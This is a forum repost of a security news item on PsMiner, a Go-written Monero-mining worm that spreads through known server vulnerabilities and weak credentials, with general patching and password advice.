Jump to content

PsMiner propagates by exploiting known vulnerabilities and weak credentials


The AchieVer

Recommended Posts

The AchieVer

PsMiner propagates by exploiting known vulnerabilities and weak credentials

 

Computer Bug, Worm, Virus, Computer, Insect, Computer Keyboard, Computer Software, Internet, Animal, Data, countermeasure, decryption, hack, hacked, harm, infected, Mainboard, Vulnerability, Technology, Security, Back Door, Encryption, Computer Network, Security System, Leaking, Breaching, Computer Hacker, Stealing, Penetrating, Entering, Traffic, Demolished, Aggression, Threats, penetration
 
  • ‘PsMiner’ is written in the Go language and includes worm-like capabilities.
  • The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SQL server.

 

360 Total Security team uncovered a new Monero mining malware dubbed ‘PsMiner’ that is written in the Go language and includes worm-like capabilities. 

How does it propagate?

 

  • The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SQL server. 
  • It also spreads using weak system credentials. 

 

What are its capabilities?

 

  • PsMiner can brute-force the weak or default system credentials by its password cracking module.
  • After successful exploitation of vulnerabilities or weak credentials, the malware can execute Powershell command in the victim’s machine using cmd.exe.
  • The executable will download a ‘WindowsUpdate.ps1’ malicious payload, which will drop the Monero miner.
  • PsMiner will then use the open source Xmrig CPU miner to mine for Monero cryptocurrency.

 

Worth noting - 360 Total Security team noted that PsMiner acquired a total of about 0.88 Monero coins in just 2 weeks.

How to stay protected?

 

  • In order to stay protected from such malware, it is highly recommended to patch all known vulnerabilities and users should upgrade to the patched versions.
  • It is also recommended to reset all default passwords to strong, unique, and complex passwords.
  • Users must ensure passwords are periodically rotated and all systems are up-to-date.
  • It is always best to install good antivirus software.

 

“PsMiner exploits a variety of high-risk vulnerabilities, as of now, the relevant manufacturers have completed the repair, it is recommended that affected users upgrade the relevant server components as soon as possible,” 360 Total Security stated in their blog.

 

 

 

Source

Link to comment
Share on other sites


  • Replies 0
  • Views 223
  • Created
  • Last Reply

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...